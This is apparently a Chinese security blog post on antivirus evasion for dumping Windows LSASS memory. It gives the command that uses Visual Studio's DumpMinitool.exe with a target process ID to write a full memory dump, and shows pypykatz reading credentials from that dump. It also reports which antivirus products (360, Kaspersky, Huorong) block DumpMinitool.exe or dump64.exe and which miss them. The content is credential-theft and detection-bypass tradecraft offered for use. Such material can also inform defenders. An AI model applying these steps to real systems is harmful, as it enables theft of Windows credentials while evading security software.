免杀技术 – dump lsass 实测

DumpMinitool.exe

经测试,360 和卡巴拦截,火绒正常

Visual Studio 2022 的一个程序,使用这个需要安装扩展开发

免杀技术 - dump lsass 实测
C:Program FilesMicrosoft Visual Studio2022CommunityCommon7IDEExtensionsTestPlatformExtensionsDumpMinitool.exe
免杀技术 - dump lsass 实测

使用命令

DumpMinitool.exe --file c:userspublictest.txt --processId PID --dumpType Full

# 读取
pip install pypykatz
pypykatz lsa minidump 111.txt
免杀技术 - dump lsass 实测

360 拦截

免杀技术 - dump lsass 实测

卡巴斯基拦截

免杀技术 - dump lsass 实测

火绒不拦截

免杀技术 - dump lsass 实测

dump64.exe

卡巴斯基拦截,火绒和 360 不拦截

360 不拦截

免杀技术 - dump lsass 实测

火绒不拦截

免杀技术 - dump lsass 实测
© 版权声明
THE END
喜欢就支持一下吧
点赞13 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容